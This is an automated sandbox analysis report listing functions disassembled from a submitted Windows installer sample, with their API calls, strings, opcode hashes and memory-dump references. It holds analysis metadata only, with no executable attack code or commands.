Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
